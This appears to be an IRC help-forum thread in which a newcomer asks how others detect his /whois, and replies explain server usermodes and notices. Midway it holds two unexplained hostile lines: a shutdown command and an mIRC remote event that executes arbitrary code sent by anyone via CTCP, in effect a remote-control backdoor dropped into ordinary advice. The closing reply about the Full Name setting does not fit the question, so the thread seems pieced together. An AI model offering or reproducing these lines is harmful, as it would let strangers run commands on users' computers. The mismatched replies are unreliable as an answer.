hi,

I'm new here and would like to know something. I've noticed that some chatters know if i do a /whois on them. How do they know it? Is there anyway i can know that too?

thanks

Most networks support a usermode that'll tell them that they're being /whois'd. (Limited to IRC operators only, unless they send a raw string allowing it to be allocated onto you.)

Quote:

-server.name- *** Notice -- nick (user@host) did a /whois on you.

Normally only people with IRCops access have the ability to see messages that show when someone uses the /whois command.

As stated, this ability is controlled by a usermode, and that usermode varies depending on the IRCd that is used.

If you were to get the message at all, it would be in the form of a notice from the server or services, not from a raw event, so in either case you'd be looking at an "on notice" event.

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}

Actually, I used GoVal IRCd (Now deprecated.) once which returns a "You're being whois'd by ..." in the form of a raw event.

386 if I remember correctly.

This can be changed in:

Tools > Options (Alt + O) > Connect change the Full Name section.

Alternatively, /fullname Some Text Here does the same as above.

Note: This doesn't have to be your real name, it can be a name of your script, your first name etc.
